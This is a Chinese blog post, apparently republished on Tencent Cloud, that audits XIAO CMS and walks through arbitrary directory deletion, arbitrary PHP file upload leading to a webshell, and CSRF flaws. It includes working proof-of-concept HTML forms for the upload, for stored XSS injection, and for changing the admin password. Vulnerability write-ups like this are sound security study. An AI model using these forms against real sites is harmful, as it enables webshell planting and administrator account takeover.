前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >XIAO CMS审计

XIAO CMS审计

作者头像
安恒网络空间安全讲武堂
发布2018-12-25 17:18:07
1.2K0
发布2018-12-25 17:18:07
举报
文章被收录于专栏:安恒网络空间安全讲武堂安恒网络空间安全讲武堂

翻安全客的时候看到xiao cms爆了6个cve审计一下

任意目录删除

跟进一下database.php 看到action是import找到那个函数

可以看到 paths 这个post参数并没有对./进行过滤,可以进行任意文件删除,而且payload的paths参数应该是post=。= 放一个自己的目录测试一下

创建了一个ckj123的目录,试下能不能删除

成功

上传任意文件

很明显的可以看到uploadfile.php文件 找到上传文件的地方

所有的upload需要一个upload函数

看到他加载了一个叫做upload的类 然后获得了文件最后的扩展名,判断了是图片还是别的文件 跟进upload

跟进upload类

里面有个过滤的地方

获得后缀,跟限制的类型进行比较

可以看到这个type是需要自己传进去的

总共两个action 下面那个的type是规定死的 发现上面那个的type是需要自己传进去的这就可以传php文件了

代码语言:javascript
复制
<html>
    <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=uploadfile&a=uploadify_upload&type=php&size=1000" method="post" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" name="submit" value="submit" />
    </form>
</body>
</html>

CVE给的payload不对。。

成功了,然后连接一下这个马

CSRF

他没有判断referer是从哪里来的,可以随意csrf,举两个例子 任意添加一个xss面板

代码语言:javascript
复制
<html>
  <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=content&a=add&catid=3" method="POST">
      <input type="hidden" name="data[catid]" value="3" />
      <input type="hidden" name="data[title]" value="test" />
      <input type="hidden" name="data[thumb]" value="" />
      <input type="hidden" name="data[keywords]" value="" />
      <input type="hidden" name="data[description]" value="" />
      <input type="hidden" name="data[content]" value="<script>alert(1)</script>" />
      <input type="hidden" name="data[xiao_auto_description]" value="1" />
      <input type="hidden" name="data[xiao_auto_thumb]" value="1" />
      <input type="hidden" name="data[xiao_download_image]" value="1" />
      <input type="hidden" name="data[time]" value="2018-11-02+15:05:43" />
      <input type="hidden" name="data[hits]" value="" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

改管理员的密码

代码语言:javascript
复制
<form action="http://127.0.0.1:8080/admin/index.php?c=index&amp;a=my" method="POST">       
<input type="hidden" name="data[password]" value="1234567">
<input type="hidden" name="submit" value="提交" />
<input type="submit" value="Submit request" />
</form>

后记

xss的漏洞没看,以后有空补上,xss要跟的地方太多了=。=,太菜

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-12-10,如有侵权请联系 cloudcommunity@tencent.com 删除
安全漏洞

本文分享自 恒星EDU 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

安全漏洞
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 任意目录删除
  • 上传任意文件
  • CSRF
  • 后记
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论